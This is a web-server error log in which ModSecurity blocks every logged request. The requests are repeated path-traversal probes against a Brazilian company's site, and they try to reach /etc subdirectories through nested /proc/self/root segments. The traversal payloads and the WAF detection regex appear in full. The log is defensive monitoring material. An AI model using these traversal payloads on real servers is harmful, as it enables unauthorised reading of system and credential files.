[Mon Mar 16 18:49:17.346695 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:46082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh63Ur9dMAiw-8KANNpmgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:18.656189 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:41334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh63kr9dMAiw-8KANNpnAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:19.064984 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:49288] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6346lpbStxTqkSkuJVAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:19.963022 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:41346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh630r9dMAiw-8KANNpnwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:26.705224 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:41360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh65s_BxrYCr4hPDw8LTAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:29.223656 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:41366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh66aTCbgAP5jq5TehMMgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:30.552791 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:34002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh66rABkC4fWIHEf8EZawAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:32.979795 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:34018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh67Er9dMAiw-8KANNppAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:33.133325 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:49288] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh67Y6lpbStxTqkSkuJYQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:49:34.341634 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:34020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh67rABkC4fWIHEf8EZbgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:37.772777 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:34036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh68bABkC4fWIHEf8EZdQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:40.247358 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:36988] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh69M_BxrYCr4hPDw8LWAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:41.582249 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:36996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh69bysWC90G-1nBrBmAgAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:42.937373 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:37000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh69kr9dMAiw-8KANNppgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:45.398556 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:37010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6-Ur9dMAiw-8KANNpqAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:47.160276 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:37704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6-7ABkC4fWIHEf8EZfwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:48.931250 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:37018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6_P9ocpUE4ed4uDwU4wAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:51.316258 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:50144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh6_6QpVkWug9HeOt9U-gAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:52.848150 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:40108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7AI6lpbStxTqkSkuJZwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:49:53.738977 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:50160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7AdSswJuvopo3lOiBewAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:56.399604 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:50168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7A46lpbStxTqkSkuJawAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:49:57.709564 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:50176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7BbABkC4fWIHEf8EZggAAAEk"], referer: 